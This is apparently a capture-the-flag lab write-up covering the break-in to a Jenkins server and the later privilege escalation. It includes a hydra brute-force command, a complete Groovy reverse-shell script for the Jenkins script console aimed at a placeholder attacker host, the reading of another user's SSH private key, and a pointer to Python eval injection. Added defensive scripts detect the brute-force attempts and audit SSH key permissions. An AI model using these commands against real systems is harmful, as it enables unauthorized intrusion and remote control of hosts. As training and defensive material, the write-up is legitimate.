Nmap Scan
From the nmap scan only two ports were open, 22 and 30609.
Port 22 seemed to run the default service, SSH, but port 30609 looked odd to me: it was running HTTP.
I decided to work on it.
This port was running Jenkins. As usual I tried default credentials, but they didn't work. I also looked up the Jenkins version to see if there was a CVE I could use :) but, unfortunately, had no success with that.
Whenever I see a login page, SQL injection always comes to mind, so I intercepted a request and used sqlmap to test for SQL injection; that didn't work either.
I tried to brute-force the login page for a weak password. My first assumption was that there is a user called admin or administrator, and for the password part I decided to go with rockyou.
I used Burp Suite to intercept a request so I could get the proper format of the login request and its error message; with that information I could use hydra:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.150.150.38 -s 30609 http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password"
NOTE: users.txt contains only the two users from my assumption, admin and administrator.
Hydra was able to find a correct combination of user and password.
Actually I had no idea how to get a reverse shell after getting the admin panel, so I had to use my friend Google for this one.
Google came through: I found a very good page explaining how to abuse Jenkins: https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
You can go and read it.
In short, go to Manage Jenkins → Script Console and use the following script:
String host = "Attacker_IP";
int port = Attacker_PORT;
String cmd = "bash"; // depending on the target's OS
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
Start a netcat listener and run the script.
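From the defender's side, both steps above (the hydra run against /j_acegi_security_check and the execution through the script console) leave a clear trail in the HTTP access log in front of Jenkins. The script below is an added example, not part of this writeup and not Jenkins code: it parses constructed NCSA combined-format log lines (the IPs, timestamps and requests are made up), flags a source that posts to the login endpoint many times inside a short window, and reports any POST to the script console paths /script or /scriptText. The window and threshold values are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log (NCSA combined format, as a reverse proxy in
# front of Jenkins might write it). Hypothetical data, not from any real host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2023:10:00:01 +0000] "GET /login HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2023:10:00:09 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2023:10:00:30 +0000] "GET / HTTP/1.1" 200 8820 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2023:10:01:00 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2023:10:01:00 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2023:10:01:01 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2023:10:01:01 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2023:10:01:02 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2023:10:01:02 +0000] "POST /j_acegi_security_check HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2023:10:03:15 +0000] "POST /script HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
this line is deliberately malformed and must be skipped, not crash the parser
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/j_acegi_security_check"              # Jenkins form-login endpoint (as in the hydra command)
SCRIPT_CONSOLE_PATHS = {"/script", "/scriptText"}  # Jenkins script console endpoints

def parse_line(line):
    """Parse one access-log line into a dict, or return None for unparseable input."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path").split("?", 1)[0], "status": int(m.group("status"))}

def max_burst(times, window):
    """Largest number of events that fall inside any interval of length `window`."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def detect(log_text, window=timedelta(seconds=60), threshold=5):
    """Return login brute-force sources (ip -> burst size) and script console POSTs."""
    login_posts = defaultdict(list)
    script_console = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST":
            continue
        if ev["path"] == LOGIN_PATH:
            login_posts[ev["ip"]].append(ev["ts"])
        elif ev["path"] in SCRIPT_CONSOLE_PATHS:
            script_console.append((ev["ip"], ev["ts"].isoformat(), ev["path"]))
    bruteforce = {}
    for ip, times in login_posts.items():
        burst = max_burst(times, window)
        if burst >= threshold:
            bruteforce[ip] = burst
    return {"bruteforce": bruteforce, "script_console": script_console}

if __name__ == "__main__":
    for kind, hits in detect(SAMPLE_LOG).items():
        print(kind, hits)
```

Counting every POST to the login endpoint, rather than only failures, avoids depending on how a particular Jenkins version signals a bad login; a legitimate user never submits the form dozens of times a minute. Script console POSTs are worth alerting on individually: on most installations they should be rare and tied to a known administrator.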
Privilege escalation
Checking the home directory shows only one user.
In juniordev's home directory there is a .ssh directory. We can't list its contents, but it is common for id_rsa to be found in .ssh, so by trying to cat id_rsa directly we can read its contents.
By copying the content of id_rsa to the local machine, we can ssh as the juniordev user.
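What makes this step possible is a key file that is readable even though its directory is not listable. The check a defender wants here is an audit of home directories for .ssh directories and private keys whose group/other permission bits are set. The script below is an added example, not from the writeup: it builds a throwaway fake home tree in a temp directory with constructed permissions, one user mirroring the juniordev situation (traversable .ssh, world-readable id_rsa) and one with correct permissions, then runs the audit against it. On a real host you would call audit_ssh_keys("/home") as root so every directory can be read; the key file names it looks for are the OpenSSH defaults.

```python
import os
import stat
import tempfile

PRIVATE_KEY_NAMES = ("id_rsa", "id_dsa", "id_ecdsa", "id_ed25519")
GROUP_OR_OTHER = stat.S_IRWXG | stat.S_IRWXO   # any permission bit outside the owner's

def audit_ssh_keys(home_root):
    """Return (path, reason) findings for .ssh dirs and private keys exposed beyond the owner."""
    findings = []
    for user in sorted(os.listdir(home_root)):
        ssh_dir = os.path.join(home_root, user, ".ssh")
        if not os.path.isdir(ssh_dir):
            continue
        dmode = stat.S_IMODE(os.stat(ssh_dir).st_mode)
        if dmode & GROUP_OR_OTHER:
            # 711 is enough for another local user to reach a file inside by name
            findings.append((ssh_dir, f"directory mode {dmode:o}, expected 700"))
        for name in os.listdir(ssh_dir):
            path = os.path.join(ssh_dir, name)
            if name in PRIVATE_KEY_NAMES and os.path.isfile(path):
                kmode = stat.S_IMODE(os.stat(path).st_mode)
                if kmode & GROUP_OR_OTHER:
                    findings.append((path, f"private key mode {kmode:o}, expected 600"))
    return findings

def build_demo_tree():
    """Construct a fake /home in a temp dir (demo fixture with placeholder key content)."""
    root = tempfile.mkdtemp(prefix="fakehome_")
    layout = {
        # user:       (.ssh dir mode, key file name, key mode)
        "juniordev": (0o711, "id_rsa", 0o644),      # the writeup's situation
        "ops":       (0o700, "id_ed25519", 0o600),  # correct permissions
    }
    for user, (dmode, key, kmode) in layout.items():
        ssh_dir = os.path.join(root, user, ".ssh")
        os.makedirs(ssh_dir)
        key_path = os.path.join(ssh_dir, key)
        with open(key_path, "w") as f:
            f.write("-----BEGIN OPENSSH PRIVATE KEY-----\n(placeholder, not a real key)\n")
        os.chmod(key_path, kmode)
        os.chmod(ssh_dir, dmode)   # set the directory mode last so the file write above succeeds
    return root

if __name__ == "__main__":
    for path, reason in audit_ssh_keys(build_demo_tree()):
        print(f"{path}: {reason}")
```

The directory check flags 711 on purpose: a non-listable directory only hides file names, and a predictable name like id_rsa defeats that, exactly as the writeup shows.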
Using an automated approach, upload linpeas to the target machine to find possible PrivEsc vectors automatically. Using linpeas I found an internal service running on port 8080.
Simply by using an SSH tunnel, we can access that internal service:
ssh -L 9000:127.0.0.1:8080 juniordev@10.150.150.38 -i id_rsa -fN
After opening the address in the browser, we see a calculator, and judging by the title it seems to be written in Python.
The application simply adds two numbers and gives the answer. Since the page title says it is a Python application, a likely implementation is Python's eval() function performing the calculation on the user's input.
Using an article on how to exploit Python applications, we can find Python code injection and get a reverse shell; you can read the article here: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
After getting the reverse shell, it was the root user :)